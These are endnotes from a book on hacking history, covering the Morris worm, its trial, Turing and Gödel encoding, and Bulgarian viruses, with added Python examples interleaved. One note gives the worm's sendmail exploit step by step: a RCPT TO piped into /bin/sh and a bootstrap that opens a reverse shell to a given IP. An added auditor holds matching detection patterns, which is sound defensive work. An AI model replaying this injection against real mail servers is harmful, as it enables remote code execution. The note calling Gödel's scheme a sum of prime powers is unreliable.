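The 32-bit and 128-bit figures in this note can be checked directly. The following is an added example, not code from the book: a hand-written dotted-quad parser that enforces the four-octets-of-0-to-255 rule, and a `describe` helper built on Python’s standard `ipaddress` module that reports the version, bit width, integer value and canonical spelling of any address, using the www.yale.edu addresses quoted in the note as input.

```python
"""Added example: IPv4 vs. IPv6 address structure, by hand and via ipaddress."""
import ipaddress

IPV4_BITS, IPV6_BITS = 32, 128


def parse_ipv4(text):
    """Dotted quad -> 32-bit integer. Rejects anything that is not exactly four
    decimal octets in 0..255 (leading zeros are refused too, to avoid octal ambiguity)."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError(f"IPv4 address needs four octets: {text!r}")
    value = 0
    for octet in parts:
        if not octet.isdigit() or (len(octet) > 1 and octet[0] == "0") or int(octet) > 255:
            raise ValueError(f"bad octet {octet!r} in {text!r}")
        value = (value << 8) | int(octet)   # each octet occupies 8 of the 32 bits
    return value


def describe(text):
    """Validate an IPv4 or IPv6 address and report its structure."""
    addr = ipaddress.ip_address(text)      # raises ValueError on malformed input
    bits = IPV4_BITS if addr.version == 4 else IPV6_BITS
    return {
        "version": addr.version,
        "bits": bits,
        "integer": int(addr),
        "binary": format(int(addr), f"0{bits}b"),
        "canonical": addr.compressed,      # IPv6 zero-run shortened with "::"
        "expanded": addr.exploded,         # every group written out in full
        "space": 1 << bits,                # 2^32 or 2^128 possible addresses
    }


if __name__ == "__main__":
    for sample in ("151.101.2.133", "2a04:4e42:0:0:0:0:0:645"):
        info = describe(sample)
        print(f"{sample}: IPv{info['version']}, {info['bits']} bits, "
              f"integer {info['integer']}, canonical {info['canonical']}, "
              f"address space {info['space']:.3e}")
    print("hand parse:", parse_ipv4("151.101.2.133"))
```

The hand parser and `int(ipaddress.ip_address(...))` agree on every valid IPv4 address; the difference is that `describe` also handles IPv6, where the canonical form collapses the run of zero groups in 2a04:4e42:0:0:0:0:0:645 to 2a04:4e42::645.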
three separate files: Even if the worm had been sent in one file, its size would have required it to be split over multiple packets.
even if technologically possible: Modern network devices, such as firewalls, have the ability to engage in “deep packet inspection”—to inspect the data carried in payloads. Deep packet inspection would not have been practical to implement in internet routers because it would degrade communication speed, especially given the technology available in the 1980s. (Strictly speaking, routers operate at the internet layer, not the application layer, so they would not have access to the payloads in question.)
end-to-end principle: J. H. Saltzer, D. P. Reed, and D. D. Clark, “End-to-End Arguments in System Design,” ACM Transactions on Computer Systems, November 1984, https://web.mit.edu/Saltzer/www/publications/endtoend/endtoend.pdf.
not internet vulnerabilities: TCP/IP had security flaws. See, e.g., Steven M. Bellovin, “Security Problems in the TCP/IP Protocol Suite,” Computer Communication Review, April 1989, and Steven M. Bellovin, “A Look Back at ‘Security Problems in the TCP/IP Protocol Suite,’” Annual Computer Security Applications Conference, December 2004. One of the major flaws in the protocol was discovered by Robert Morris Jr., who wrote an article on TCP sequence guessing in 1985, while a sophomore in college: Morris, “A Weakness in the 4.2 BSD Unix TCP/IP Software.” But in his worm Morris did not exploit this or any other flaw of TCP/IP. These protocols were simply used to transmit the worm, which exploited security weaknesses in other services.
BSD 4.2: For the development of the Berkeley Software Distribution, see Marshall Kirk McKusick, “Twenty Years of Berkeley Unix from AT&T—Owned to Freely Redistributable,” in Open Sources: Voices from the Open Source Revolution, ed. Chris DiBona et al. (Sebastopol, CA: O’Reilly, 1999), 31. BSD 4.2 was the first major UNIX distribution to have integrated TCP/IP, though it was present in smaller distributions such as BSD 4.1a–4.1c. See McKusick, 37–38.
unaffected by the worm: See, e.g., Michael Wines, “‘Virus’ Intruder Eliminated, Defense Agency Aides Say,” The New York Times, November 5, 1988.
Military computers were protected: The military internet was connected to the public internet only through special bridges that enabled email to pass through. When the Morris worm hit, military administrators disconnected those bridges, thereby containing the damage.
provide logical proofs: MacKenzie and Pottinger, “Mathematics, Technology,” 46.
information security needs: See, e.g., Michael Warner, “Cybersecurity: A Pre-history,” Intelligence and National Security, 2012; Stephen B. Lipner, “The Birth and Death of the Orange Book,” IEEE Annals of the History of Computing, April–June 2015.
pitfalls of this strategy: On the VMM Security Kernel, see Paul A. Karger et al., “A Retrospective on the VAX VMM Security Kernel,” IEEE Transactions on Software Engineering, November 1991, 1147–65.
a secret backdoor: Karger et al., “Retrospective,” 1159.
expense of advertising and supporting the product: Karger et al., “Retrospective,” 1163.
FOSS: For the locus classicus of FOSS, see Richard Stallman, “GNU Manifesto,” March 1985, http://ftp.math.utah.edu/pub/tex/bib/toc/dr-dobbs-1980.html#10(3): March 1985. For an excellent ethnography of the FOSS LINUX/Debian community, see Gabriella Coleman, Coding Freedom: The Ethics and Aesthetics of Hacking (Princeton, NJ: Princeton University Press, 2012).
all bugs are shallow: Linus’s law was formulated by Eric S. Raymond in The Cathedral and the Bazaar (Sebastopol, CA: O’Reilly Media, 1999). Raymond named his law in honor of Linus Torvalds, the first developer of the Linux kernel.
military built its internet: Thomas G. Harris et al., “Development of the MILNET,” 15th Annual Electronics and Aerospace Systems Conference (1982), 77–80.
imposed strict security requirements: Milnet, however, was not very secure. See Cliff Stoll, “How Secure Are Computers in the U.S.A.? An Analysis of a Series of Attacks on Milnet Computers,” Computers & Security 7, 6 (1988).
not a pejorative: “HACKER noun 1. A person who enjoys learning the details of computer systems and how to stretch their capabilities—as opposed to most users of computers, who prefer to learn only the minimum amount necessary. 2. One who programs enthusiastically or who enjoys programming rather than just theorizing about programming.” E. S. Raymond, The New Hacker’s Dictionary (Cambridge, MA: MIT Press, 1991).
sinister connotations: On the transformation in the meaning of the term, see Helen Nissenbaum, “Hackers and the Contested Ontology of Cyberspace,” New Media & Society 6 (April 2004): 195–217. Some coined the term cracker to refer to the latter, more sinister connotation and distinguish it from the original meaning. See Eric Raymond, “Cracker,” Jargon File, http://www.catb.org/jargon/html/C/cracker.html.
formally verifying software: W. D. Young and J. McHugh, “Coding for a Believable Specification to Implementation Mapping,” IEEE Computer Society Symposium on Security and Privacy, 1987, 140–48.
the future would bring: The Morris Worm prompted the creation of the first CERT (Computer Emergency Response Team), at Carnegie Mellon University. According to Spafford, CERT’s mission was to coordinate the civilian and military parts of the internet. (“The purpose of CERT is to act as a central switchboard and coordinator for computer security emergencies on Arpanet and MILnet computers”: Eugene Spafford, “Crisis and Aftermath,” Communications of the ACM 32, no. 6 [1989], 685.) In response to 9/11, the Department of Homeland Security established its own response team, US-CERT, in 2003. See generally Rebecca Slayton and Brian Clarke, “Trusting Infrastructure: The Emergence of Computer Security Incident, 1989–2005,” Technology and Culture 61 (2020). On the proliferation of CERTs, see Laura DeNardis, The Global War for Internet Governance (Oxford: Oxford University Press, 2014), 90–92: “Although one of the original objectives of the first response team was to centrally coordinate responses to Internet-wide security breaches, what has materialized over time is a mosaic of hundreds of independently operating CERTs across the world,” 92.
“That attitude is completely”: John Markoff, “Living with the Computer Whiz Kids,” The New York Times, November 8, 1988. See also “Hacker’s Fate Hangs in the Balance,” Syracuse Herald-Journal, February 1, 1989, A4.
permitted to reapply: John Markoff, “Cornell Suspends Computer Student,” The New York Times, May 25, 1989. Some observed that Morris was using the very skills that made him attractive to Cornell in the first place. “We like to have a fairly well-rounded student body,” said Dexter Kozen, a Cornell computer-science professor. “His creativity had manifested itself as being a good hacker, and we certainly need that in the department and that’s why he was admitted.”
“When all is said and done”: John Markoff, “How a Need for Challenge Seduced Computer Expert,” The New York Times, November 8, 1988.
calling it a “virus”: Mark W. Eichin and Jon A. Rochlis, “With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988,” IEEE Symposium on Research in Security and Privacy, 1989, https://www.mit.edu/people/eichin/virus/main.html.
“One conclusion that may surprise”: Eugene Spafford, “The Internet Worm Program: An Analysis,” Purdue Technical Report CSD-TR-823, November 29, 1988, 2, https://spaf.cerias.purdue.edu/tech-reps/823.pdf.
Ken Thompson published in 1979: Robert Morris Sr. and Ken Thompson, “Password Security: A Case History,” Communications of the ACM, 22, 11 (January 1979), 595.
“What this routine does”: Source code for hs.c, line 666, https://github.com/arial-domartini/morris-worm/blob/master/hs.c. Morris did not invent the stack overflow. This exploitation technique had already been described in 1972. James P. Anderson, “Computer Security Technology Planning Study,” October 1972, 61, https://apps.dtic.mil/sti/pdfs/AD0758206.pdf. The stack overflow technique was popularized by the hacker Aleph One in his “Smashing the Stack for Fun and Profit” article, https://github.com/rootkiter/phrack/blob/master/phrack49/14.txt.
“What the Tortoise Said to Achilles”: Lewis Carroll, “What the Tortoise Said to Achilles,” Mind, 1895, 691–93.
was the Tortoise: Though Achilles actually submits the code to the computer instead of data, it is the Tortoise that tricks him into doing it.
no computer-specific offenses: For a very helpful discussion, see Orin Kerr, “Cybercrime’s Scope: Interpreting ‘Access’ and ‘Authorization’ in Computer Misuse Statutes,” New York University Law Review, 78 (2003), 1596.
amenable to theft: Kerr, “Cybercrime’s Scope,” 1605.
CFAA in 1986: See Computer Fraud and Abuse Act, October 16, 1986, codified as amended at 18 USC §1030.
five to twenty years in jail: 18 USC §1030(c). For helpful summaries of the CFAA punishment schedule, see “Cybercrime and the Law: Computer Fraud and Abuse Act (CFAA) and the 116th Congress,” Congressional Research Service, R46536, September 21, 2020, 21–22, https://sgp.fas.org/crs/misc/R46536.pdf.
punishable by up to five years: Section (a)(3) of the CFAA states, “Whoever intentionally, without authorization to access any computer of a department or agency of the United States, accesses such a computer of that department or agency that is exclusively for the use of the Government of the United States or, in the case of a computer not exclusively for such use, is used by or for the Government of the United States and such conduct affects the use of the Government’s operation of such computer.”
in only one way: As code, that is. The point of the Duality Principle, as we will see, is that the symbols that make up the code can be parsed as data as well.
losses of more than $1,000: Section (a)(5): “Intentionally accesses a Federal interest computer without authorization, and by means of one or more instances of such conduct … prevents authorized use of any such computer or information, and thereby causes loss to one or more others of a value aggregating $1,000 or more during any one year period.” Federal-interest computers are either government computers, financial institutions’ computers, or computers in different states: 18 USC §1030 (e)(2).
that was indisputable: On appeal, Morris disputed the “without authorization” element of the offense as well. He argued that he did not access protected computers on the internet “without authorization” because he was authorized to be on the internet. The 2nd Circuit rejected this argument. United States v. Robert Tappan Morris (1991), 928 F.2d 504, 508–11.
decided to charge Morris with a felony: Associated Press, “Source: Misdemeanor Offered in ‘Virus’ Case,” Syracuse Post-Standard, February 2, 1989.
He got a jury of noobs: Noob is short for “newbie,” a person who is inexperienced in a particular sphere or activity, especially computing or the use of the internet.
most experienced: Biographical information at https://en.wikipedia.org/wiki/Mark_Rasch.
“The government will prove”: Rasch, Morris transcript, 97.
“Robert Tappan Morris”: 18 USC §1030 (numbering added).
“You will hear evidence”: Guidoboni opening argument, Morris transcript, 113–14.
turned into a number: “This new description of the machine may be called the standard description (S.D.). It is made up entirely from the letters ‘A’, ‘C’, ‘D’, ‘L’, ‘R’, ‘N’, and from ‘;’. If finally we replace ‘A’ by ‘1’, ‘C’ by ‘2’, ‘D’ by ‘3’, ‘L’ by ‘4’, ‘R’ by ‘5’, ‘N’ by ‘6’, and ‘;’ by ‘7’ we shall have a description of the machine in the form of an arabic numeral.” Alan Turing, “On Computable Numbers, with an Application to the Entscheidungsproblem,” Proceedings of the London Mathematical Society, 1936, 241–42.
the following encoding scheme: Turing had gotten this core insight from Gödel’s incompleteness theorem, in which Gödel figured out how a mathematical statement could talk about itself. See Kurt Gödel, “Über formal unentscheidbare Sätze der Principia Mathematica und verwandter Systeme I,” Monatshefte für Mathematik und Physik 37 (1931): 173–98.
compress into a single number: Take successive prime numbers raised to the power of each number in the sequence and add them together:
$$
\begin{aligned}
&2^{8} + 3^{6} + 5^{1} + 7^{22} + 11^{20} + 13^{18} + 17^{7} + 19^{5} + 23^{18} + 29^{13} + 31^{16} + 37^{18} + 41^{13} + 43^{8} + 47^{17} + 53^{5} + 59^{8} + {} \\
&61^{17} + 67^{1} + 71^{16} + 73^{5} + 79^{14} + 83^{18} + 89^{8} + 97^{10} + 101^{5} + 103^{21} + 107^{1} + 109^{12} + 113^{4} + 127^{2} + {} \\
&131^{22} + 137^{20} + 139^{1} + 149^{10} + 151^{10} + 157^{16} + 163^{5} + 167^{14} + 173^{18} + 179^{8} + 181^{10} + 191^{5} + 193^{17} + {} \\
&197^{1} + 199^{16} + 211^{5} + 223^{11} + 227^{13} + 229^{16} + 233^{18} + 239^{1} + 241^{10} + 251^{21} + 257^{18} + 263^{7} + 269^{5} + {} \\
&271^{12} + 277^{14} + 281^{16} + 283^{8} + 293^{12} + 307^{18} + 311^{20} + 313^{18} + 317^{7} + 331^{5} + 337^{18} + 347^{13} + 349^{16} + {} \\
&353^{18} + 359^{13} + 367^{8} + 373^{17} + 379^{5} + 383^{8} + 389^{17} + 397^{11} + 401^{13} + 409^{16} + 419^{18} + 421^{1} + 431^{10} + {} \\
&433^{21}
\end{aligned}
$$
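The following is an added worked example, not code from the book, that makes the prime-exponent scheme concrete. It takes the 84 exponents from the note above (8, 6, 1, 22, …) and packs them into one integer. One caveat a practitioner would want: Gödel’s own construction multiplies the prime powers rather than adding them, and multiplication is what makes the number uniquely decodable, by dividing out successive primes. The example therefore uses the product form for encoding and decoding, and keeps the sum form alongside it only to show that two different sequences can share the same sum.

```python
from itertools import count
from typing import Iterator, List

# The 84 exponents from the note above, in order (2^8, 3^6, 5^1, 7^22, ...).
NOTE_EXPONENTS: List[int] = [
    8, 6, 1, 22, 20, 18, 7, 5, 18, 13, 16, 18, 13, 8, 17, 5, 8,
    17, 1, 16, 5, 14, 18, 8, 10, 5, 21, 1, 12, 4, 2,
    22, 20, 1, 10, 10, 16, 5, 14, 18, 8, 10, 5, 17,
    1, 16, 5, 11, 13, 16, 18, 1, 10, 21, 18, 7, 5,
    12, 14, 16, 8, 12, 18, 20, 18, 7, 5, 18, 13, 16,
    18, 13, 8, 17, 5, 8, 17, 11, 13, 16, 18, 1, 10,
    21,
]


def primes() -> Iterator[int]:
    """Yield 2, 3, 5, 7, ... by trial division; fast enough for a few hundred primes."""
    found: List[int] = []
    for n in count(2):
        if all(n % p for p in found if p * p <= n):
            found.append(n)
            yield n


def godel_encode(exponents: List[int]) -> int:
    """Gödel's construction: the i-th prime raised to the i-th exponent, all multiplied."""
    n = 1
    for p, e in zip(primes(), exponents):
        n *= p ** e
    return n


def godel_decode(n: int) -> List[int]:
    """Recover the exponents by dividing out successive primes until nothing is left.

    Trailing zero exponents cannot be distinguished from the end of the sequence;
    with the note's scheme every exponent is at least 1, so that never arises.
    """
    exponents: List[int] = []
    for p in primes():
        if n == 1:
            break
        e = 0
        while n % p == 0:
            n //= p
            e += 1
        exponents.append(e)
    return exponents


def prime_power_sum(exponents: List[int]) -> int:
    """The sum form as the note words it, kept to show it is not uniquely decodable."""
    return sum(p ** e for p, e in zip(primes(), exponents))


if __name__ == "__main__":
    n = godel_encode(NOTE_EXPONENTS)
    print(f"product form has {len(str(n))} decimal digits")
    assert godel_decode(n) == NOTE_EXPONENTS
    # Two different sequences with the same sum: 2^1 + 3^2 == 2^3 + 3^1 == 11.
    print(prime_power_sum([1, 2]), prime_power_sum([3, 1]))
```

The product for the full sequence runs to roughly two thousand decimal digits, which Python’s arbitrary-precision integers handle without trouble; the point of the decode routine is that the sequence comes back exactly, which no sum of prime powers can guarantee.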
High-voltage circuits within: The discovery that electrical circuits can represent and manipulate binary numbers was made by Claude Shannon, “A Symbolic Analysis of Relays and Switches” (PhD diss., MIT, Department of Electrical Engineering, 1940).
can run programs we load: “It is possible to invent a single machine which can be used to compute any computable sequence. If this machine U is supplied with a tape on the beginning of which is written the S.D. of some computing machine M, then U will compute the same sequence as M.” Turing, “On Computable Numbers,” 341.
“instruction pointer”: In the x86 family of microprocessors, the instruction pointer is held in the EIP, the (extended) instruction pointer register. See generally Intel 64 and IA-32 Architectures Software Developer Manuals, 3–8, www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html, or any book on assembly language written in the last thirty years.
For a description of the code: Mail from: </dev/null> (sends mail from the developmental address, standard for the debug mode); rcpt to: <"|sed -e '1,/^$/'d|/bin/sh; exit 0"> (opens the stream editor, pipes to the shell, /bin/sh, then exits); data (command to begin the content of the email; this content is sent as the input to the stream editor, which is then piped to the shell); empty line (the empty line is removed by the stream editor ['1,/^$/'d]); cd /usr/tmp (change to the temp directory); cat > x14481910.c << 'EOF' (write the standard input to x14481910.c, which is a randomly generated name for the bootstrap code, ending the standard input when it sees 'EOF'); EOF (signals the end of the file); text of bootstrap program (opens a reverse shell via a TCP socket, copies the VAX and Sun binaries); cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440 (compiles the bootstrap, then runs it with the sender’s IP address, destination port number, and challenge question); rm -f x14481910 x14481910.c (removes the bootstrap source code and compiled binary when finished); quit (quit from SMTP).
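The exchange described in the note is what a mail-server administrator of the period would have wanted to spot in an SMTP session log. The following is an added example, not code from the book or from any sendmail distribution, that audits a session transcript for the two tell-tale client lines: the DEBUG verb, and a RCPT TO whose “address” is a pipe into a shell. The transcripts are constructed for illustration; the client commands follow the note, the server replies are invented, and the bootstrap source sent in the DATA section is left out.

```python
import re
from typing import List, Tuple

# Constructed transcript modelled on the session the note describes.
SAMPLE_SESSION = """\
220 host.example Sendmail ready
debug
200 debug set
mail from: </dev/null>
250 ok
rcpt to: <"|sed -e '1,/^$/'d|/bin/sh; exit 0">
250 ok
data
354 enter mail, end with "."
.
250 queued
quit
221 closing
"""

# Constructed ordinary session, for comparison (addresses are placeholders).
BENIGN_SESSION = """\
220 host.example Sendmail ready
mail from: <alice@example.org>
250 ok
rcpt to: <bob@example.org>
250 ok
data
354 enter mail, end with "."
.
250 queued
quit
221 closing
"""

# A recipient that opens with a pipe: the message body goes to that command.
# Tolerates optional quotes and whitespace around the pipe character.
PIPE_RECIPIENT = re.compile(r'^\s*rcpt\s+to\s*:\s*<\s*"?\s*\|', re.I)
# Any recipient naming a shell binary, even without a leading pipe.
SHELL_IN_RECIPIENT = re.compile(r'^\s*rcpt\s+to\b.*?/bin/(?:sh|csh|ksh|bash)\b', re.I)
# The non-standard DEBUG verb that switched the affected sendmail into debug mode.
DEBUG_VERB = re.compile(r'^\s*debug\s*$', re.I)


def audit_smtp_session(transcript: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, finding, line) for each suspicious client line."""
    findings: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(transcript.splitlines(), start=1):
        if DEBUG_VERB.match(line):
            findings.append((lineno, "debug-verb", line.strip()))
        elif PIPE_RECIPIENT.match(line):
            findings.append((lineno, "pipe-recipient", line.strip()))
        elif SHELL_IN_RECIPIENT.match(line):
            findings.append((lineno, "shell-in-recipient", line.strip()))
    return findings


if __name__ == "__main__":
    for lineno, kind, text in audit_smtp_session(SAMPLE_SESSION):
        print(f"line {lineno}: {kind}: {text}")
    print("benign findings:", audit_smtp_session(BENIGN_SESSION))
```

Because the checks key on the shape of the RCPT TO argument rather than on the particular sed and shell invocation, they also catch variants that swap in a different command behind the pipe; the DEBUG check is the simpler and more reliable indicator, since no legitimate client had reason to send it.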
how he would ever explain data decryption: Katie Hafner and John Markoff, Cyberpunk: Outlaws and Hackers on the Computer Frontier (New York: Simon and Schuster, 1991), 333.
invaded their systems: These administrators worked at University of California–Berkeley, U.S. Army Ballistic Research Laboratory, Carnegie Mellon, Frederick Cancer Center, University of Rochester, Georgia Institute of Technology, NASA Ames Research Center, University of Illinois, Purdue University, University of Southern California, University of Florida, Lawrence Berkeley Laboratory, and Washington University.
Head of the Charles: Testimony of Paul Graham, Morris transcript, 952.
“He was pacing back and forth”: Graham, Morris transcript, 954.
“There were all sorts of”: Graham, Morris transcript, 983.
“I said, ‘You idiot’”: Graham, Morris transcript, 991–92 (inner quotation marks added).
testimonial data from juries: The common law grants additional evidentiary privileges, such as attorney-client, doctor-patient, priest-penitent, and spousal.
“slightly aloof, less endearing”: Hafner and Markoff, Cyberpunk, 338.
“So intent was he”: Hafner and Markoff, Cyberpunk, 338.
“Now, that worm, the one”: Testimony of Robert Tappan Morris, Morris transcript, 1173.
“to try to exploit Finger”: the word “demon” has been omitted. A demon, or daemon, is a service process that usually runs in the background.
“Mr. Morris, would it be fair”: Morris, Morris transcript, 1184.
“It’s perfectly honest to say”: John Markoff, “Computer Intruder Is Found Guilty,” The New York Times, January 23, 1990.
“an aggravating or mitigating circumstance”: 18 USC §3553(b)(1).
“Although in and of itself”: Morris, “Judgment Including Sentence under the Sentencing Reform Act,” addendum, 6.
“I still don’t feel”: John Markoff, “Computer Intruder Is Put on Probation and Fined $10,000,” The New York Times, May 5, 1990.
Legal fees came close to $150,000: Robert fulfilled his community service working at the Boston Bar Foundation.
“took me under his wing”: Robert Tappan Morris, “Scalable TCP Congestion Control” (PhD diss., Harvard University, January 1999).
Vesselin Bontchev: Material in the next two sections from Zoom interviews with Vesselin Bontchev, October 6, 7, and 9, 2020 (hereinafter “Interview VB”).
Report on Computer Viruses: Klaus Brunnstein, Computer-Viren-Report: Gefahren, Wirkung, Aufbau, Früherkennung, Vorsorge (Munich: Wirtschaft, Recht und Steuern, 1989).
Blagovest Sendov: https://en.wikipedia.org/wiki/Blagovest_Sendov.
Komputar za vas: Komputar za vas 1–2 (1989): 5–6.
first article: “Viruses in Memory,” Komputar za vas 4–5 (1988): 12–13.
“hard plate”: “Dr. Vesselin Bontchev: Non-Replicating Malware Has Taken over the Computer Virus,” Sensors Tech Forum, November 14, 2016, https://sensorstechforum.com/dr-vesselin-bontchev-non-replicating-malware-taken-computer-virus/.
Vesselin knew this: At the time, Vesselin did not know that the Morris worm could infect only the Sun and Vax.
regret this article: “Interview with Vesselin Bontchev,” Alive 1, no. 1 (April–July 1994).
make any mistakes: Vesselin did not realize that the source code he painstakingly reconstructed had been published the previous year by Ralf Burger, a German security researcher, in the second edition of his book Computer Viruses: A High Tech Disease (London: Abacus, 1988). Burger did make the virus less infectious, but it wasn’t hard to figure out how to make it more infectious. He also changed the payload. Whereas Vienna overwrote the first five bytes of a file with reboot instructions, Burger’s version wrote five blanks. But, as Alan Solomon pointed out, Burger’s version causes the computer to hang, instead of rebooting, which “isn’t really an improvement.” Alan Solomon, “A Brief History of PC Viruses (1986–1993),” http://users.uoa.gr/~nektar/science/technology/a_brief_history_of_viruses.htm. The publisher wrote a foreword to Burger’s book explaining the decision to publish this information: “Some readers may feel that the virus examples in the book should be omitted. It should be made clear that we have printed the examples to illustrate how easy it is to write a virus. Surely anyone who is bent on destruction will have know-how to create far more sophisticated and harmful viruses.”
figured out: “According to the Soviet anti-virus researcher Bezrukov, the first virus appeared there almost at the same time as in Bulgaria and, by the way, it was the same virus (Vienna)”: Vesselin Bontchev, “The Bulgarian and Soviet Virus Factories,” Proceedings of the 1st International Virus Bulletin Conference, 1991, 11–25, https://bontchev.nlcv.bas.bg/papers/factory.html.
Vienna is a simple virus: Well-commented source code for Vienna at https://github.com/rdebath/viruses/blob/master/virus/v/vienna.asm.
“com infector”: Mark Ludwig, The Giant Black Book of Computer Viruses, 2nd ed. (Tucson, AZ: American Eagle Books, 2019), 20–37.
types the name of the file: Command files execute even without the “.com” extension.
“Coding in Assembly is easy”: Khalil Sehnaoui (@sehnaoui), “Coding in Assembly is easy,” Twitter, June 14, 2022, https://twitter.com/sehnaoui/status/1536610933539278849.
first lab job: Interview VB.
Teodor Prevalsky: Paul Mungo and Bryan Clough, Approaching Zero (New York: Random House, 1992), 127–28.
artificial life: Fred Cohen, It’s Alive: The New Breed of Living Computer Programs (Hoboken, NJ: Wiley, 1994); Eugene Spafford, “Computer Viruses as Artificial Life,” Journal of Artificial Life, 1994. On the inspiration of the Morris Worm, see Mungo and Clough, Approaching Zero, 127.
DOS: There were two main versions of DOS: “PC-DOS,” licensed by IBM, and “MS-DOS,” sold by Microsoft. Until MS-DOS 6.0, the only difference between versions involved BASIC. John Sheesley, “My DOS version Can Beat Up Your DOS Version,” TechRepublic, April 9, 2008, https://www.techrepublic.com/article/my-dos-version-can-beat-up-your-dos-version.
Though Teodor took great care: Email correspondence with Vesselin Bontchev, December 3, 2022.
Vesselin claimed: Komputar za vas, 4–5 (1988); Mungo and Clough, Approaching Zero, 128.
lost business: Vienna is a “parasitic” virus, meaning that it infects a file and spreads along with it. Teodor figured out how to get it to replicate without infecting any files. His trick was to find an executable file. If the virus found, say, the Microsoft Word executable winword.exe, it would change its own name to winword.com. When users wanted to start Word, they would type in “winword” on their PC. But since DOS always runs command files before executable files, it would run winword.com first. The virus would replicate itself and name its copy after all the executables it could find, but again with .com extensions. Once finished copying, the virus would execute the real file, winword.exe. Thus, although this version of Vienna did not infect any file, it copied itself just the same by pairing with a companion. On companion viruses, see Ludwig, The Giant Black Book, 39–45.
tokens of his affection: Dimov authored around twenty-five viruses with memorable sounding names, like Terror and Manowar. Mungo and Clough, Approaching Zero, 132.
“Hello, I’m Murphy”: The second, known as Murphy 2, replaced the lame shuffling sound with the more exciting bouncing ball from the Ping-Pong virus. The Murphy viruses were highly infectious and made it to the West by 1991. Mungo and Clough, Approaching Zero, 133.
“We’ve counted about three hundred viruses”: Chuck Sudetic, “Bulgarians Linked to Computer Virus,” The New York Times, December 21, 1990.
“Not only do the Bulgarians”: Sudetic, “Bulgarians Linked.”
Commander Tosh: David S. Bennahum, “Heart of Darkness,” Wired, November 1, 1997, https://www.wired.com/1997/11/heartof/.
open only by invitation: Exceptions could be made in special circumstances: “If you cannot upload a virus, just ask the SYSOP [system operator] and he will decide if he will give you some viruses.”
Peter Dimov: Mungo and Clough, Approaching Zero, 132.
two new Bulgarian viruses: Globally, six viruses were being found per day in 1991. David Strang, “Virus Trends: Up, Up, Up,” National Computer Security Association News 2, no. 3 (March–April 1991): 2.
a naming convention: The original naming convention was developed in 1991 by Vesselin, Fridrik Skulason (Virus Bulletin’s technical editor), and Alan Solomon (developer of Dr. Solomon’s Antivirus Toolkit). See “A New Virus Naming Convention,” http://www.caro.org/articles/naming.html. The convention was considerably simplified in 2002. See Nick Fitzgerald, “A Virus by Any Other Name: The Revised CARO Naming Convention,” Virus Bulletin, January 2003, 8, https://www.virusbulletin.com/uploads/pdf/magazine/2003/200301.pdf. According to the revised convention, malware should be specified in the following format: <malware_type>://<platform>/<family_name>.<group_name>.<infective_length>.<sub-variant><devolution><modifiers>. Not all parameters need be used. For example, Eddie would be classified as virus://Dark_Avenger.1800.A (malware_type=virus; family_name=Dark_Avenger; infective_length=1800 (bytes); sub-variant=A).
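A parser for the revised CARO format is a small but useful tool when reconciling names across vendors, so here is one as an added example; it is not from the CARO documents or Virus Bulletin. It follows the grammar quoted in the note, with platform, group, infective length and sub-variant all optional. Because the note does not give the syntax of the devolution and modifier fields, the parser keeps everything after the dotted name as an opaque tail; the assignment of a non-numeric component to “group” or “sub-variant” is my heuristic (a trailing run of one to three capital letters is read as the sub-variant). The sample name with a platform prefix and an “@mm” tail is constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Grammar as quoted in the note:
#   <malware_type>://<platform>/<family_name>.<group_name>.<infective_length>.<sub-variant><devolution><modifiers>
_NAME_RE = re.compile(
    r"^(?P<type>[A-Za-z]+)://"                          # malware_type: virus, worm, trojan, ...
    r"(?:(?P<platform>[A-Za-z0-9_-]+)/)?"               # optional platform, e.g. W32 (assumed value)
    r"(?P<dotted>[A-Za-z0-9_]+(?:\.[A-Za-z0-9_]+)*)"    # family[.group][.length][.variant]
    r"(?P<tail>[^A-Za-z0-9_.].*)?$"                     # devolution/modifiers, kept raw
)


@dataclass(frozen=True)
class CaroName:
    malware_type: str
    family: str
    platform: Optional[str] = None
    group: Optional[str] = None
    infective_length: Optional[int] = None
    sub_variant: Optional[str] = None
    tail: str = ""


def parse_caro_name(name: str) -> CaroName:
    """Split a CARO-style name into its components; raises ValueError on bad input."""
    m = _NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a CARO-style name: {name!r}")
    family, *parts = m.group("dotted").split(".")
    group = length = variant = None
    for i, part in enumerate(parts):
        if part.isdigit() and length is None:
            length = int(part)                              # infective length in bytes
        elif i == len(parts) - 1 and re.fullmatch(r"[A-Z]{1,3}", part):
            variant = part                                  # sub-variant letters: A, B, AA, ...
        elif group is None and length is None and variant is None:
            group = part                                    # group name precedes the length
        else:
            raise ValueError(f"unexpected component {part!r} in {name!r}")
    return CaroName(m.group("type").lower(), family, m.group("platform"),
                    group, length, variant, m.group("tail") or "")


def format_caro_name(n: CaroName) -> str:
    """Rebuild the canonical string, omitting components that are absent."""
    head = f"{n.malware_type}://" + (f"{n.platform}/" if n.platform else "")
    parts = [n.family]
    if n.group:
        parts.append(n.group)
    if n.infective_length is not None:
        parts.append(str(n.infective_length))
    if n.sub_variant:
        parts.append(n.sub_variant)
    return head + ".".join(parts) + n.tail


def is_caro_name(name: str) -> bool:
    try:
        parse_caro_name(name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    eddie = parse_caro_name("virus://Dark_Avenger.1800.A")   # the note's own example
    print(eddie)
    print(format_caro_name(eddie))
```

Round-tripping through format_caro_name is a cheap consistency check: if a vendor string parses and re-formats to itself, the tool has understood every component rather than silently dropping one.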
ethical or white-hat hacking: Gary Anthes, IBM vice president for internet applications, is often credited with coining the term ethical hacking: Gary H. Anthes, “Safety First,” Computer World, June 19, 1995. The practice of hiring hackers to perform ethical hacking, however, developed slowly. “One rule that IBM’s ethical hacking effort had from the very beginning was that we would not hire ex-hackers. While some will argue that only a ‘real hacker’ would have the skill to actually do the work, we feel that the requirement for absolute trust eliminated such candidates”: C. C. Palmer, “Ethical Hacking,” IBM Systems Journal 40, no. 3 (March 1, 2001): 772.
